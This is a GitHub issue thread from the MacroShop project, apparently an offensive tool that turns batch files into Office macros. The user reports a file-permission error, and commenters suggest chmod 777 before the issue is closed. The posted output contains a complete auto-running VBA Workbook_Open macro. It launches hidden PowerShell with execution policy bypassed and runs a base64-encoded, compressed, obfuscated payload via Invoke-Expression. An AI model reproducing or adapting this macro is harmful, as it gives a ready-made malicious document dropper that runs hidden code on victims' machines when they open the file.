### ISSUE TITLE
error writing file

### ISSUE THREAD

**Issue by lucjovial** [khr0x40sh/MacroShop#7]
hi there,

every time i try to convert a .bat file onto macro i get an ''error writing file, please check permission and try again'

any idea on how to fix this?

Sub Workbook_Open()
'VBA arch detect suggested by "T"
Dim Command As String
Dim str As String
Dim exec As String

Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
    Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
    Command = "powershell.exe"
End If

str = "nVRtc9pGEP7Or9jRXGekMZLFS6mNxjMhOE7cBsc1xE7LMJ1DWtDFpz"
str = str + "v5dLLBhP/eFaiYfO0XnXa1t8+zu8+KPcEFvHMa00spr7NcG+"
str = str + "s6j2gUyk47SKR0vBnk5VyKGArLLR24svQdrpW9tQbuhbEllw"
str = str + "MpdezWPpkPksRgUTShFMpC8jIWr1gbi30spdJqss7f3LdGW4"
str = str + "ytF/1vLkOD3OIkpSN547K3B9YaMS8tHpGyPH7cMzsEk8/YA/"
str = str + "uD+5YbniFhHS7vsKiEK8mXx5F7tOuEynDeNaxZb1hCHXYG74"
str = str + "eXH64+frr+/Y/Po5svt3/ejSdf7x++/fU3n8cJLpap+P4oM6"
str = str + "XzJ1PY8vlltX4NW+1O99feb2fnTjDRw5SbgTF87XqNRaniCh"
str = str + "1ilz17GzBoS+qD606J3XQ2A/b88w34ASPkRWnQ/zL/Tm0Gf1"
str = str + "xmXkAP+AXCVSsMwccnOG9727fsFjZsUbF3olYQdH4sNBUXp7"
str = str + "7epaBvJxfAkqm7ROsbrhKdgZ/xlcgoK0uCz6iWNvVm26jmxx"
str = str + "bRUXaEDeRGx9Rq2Ex5RXTGVgRHjxNg/2wjQJUQhRWxL0gNNS"
str = str + "5sXIUv/xl3O1wvUKQF19tujwCWGyDG4DJxEUZMgC8t9Lr0dn"
str = str + "LibVhKSDZijxVgQggYAdQF0hUJgvg+UlxRBaQVIxmBWIBLPS"
str = str + "88Dw5dpwiCrQ3n/PnbV4fKnN6gDcZonkWMt5rGMuKKL9HM+v"
str = str + "3Ki2aIxoqFoE3Aey5FspPTkEs5J1kS5oZZU+I2YhkZN1RwPb"
str = str + "jxurCYBVX6B5wPpUBlowbLgk8kPDRFQPJ1nbJA4xOesk4TnJ"
str = str + "F+FVLy024QEn+d5QQ2l1TxaHz9AXpBK4IHQX18KeBm4jlexB"
str = str + "SBLiOYvl9b3Akqr9qQBZf6RUnNk0tuueuk1uZF//S0dd4OWr"
str = str + "2zoBX0+mfdbueUKQe8BtN0iej41aKTNDCbo7nEhVBiNyD2BP"
str = str + "4NLRY4hN5pO+Arsoqcxwg7z1U9ygL8nBeFTU3ZYKsLpvv9n3"
str = str + "48YZPltdya4aoThiEd3dCLpnW37kplRYYB7SkanddzKYIRN0"
str = str + "XKJQ1lqPO1y/ImhE2Y7td55rIVrREZnbbreU04gFSl0ZXj/w"
str = str + "0hNtmqWR1htW66tL4qJWlm90/xxxIxp63DWJOoz3rdMNzS7O"
str = str + "N0s/0X"

exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""

Shell exec,vbHide

End Sub

'---Generated by macro_safe.py by khr0x40sh---

'---VBA arch detection by "T"---

Error writing file.
 Please check permissions and try again.
Exiting...

**Comment by cr4nkapotomus** [comment]
What user are you running this as? It's asking you to check permissions

Edit: If on Linux, sudo the build.
If on windows, edit the files to be in your permissions

**Comment by lucjovial** [comment]
root

**Comment by cr4nkapotomus** [comment]
Run an ls -la and see what permissions the script and batch file have;
just be safe and chmod 777 the files and try to run again

**Comment by lucjovial** [comment]
cheers

**Comment by khr0x40sh** [comment]
Closing as this is an environment issue that seems to be resolved
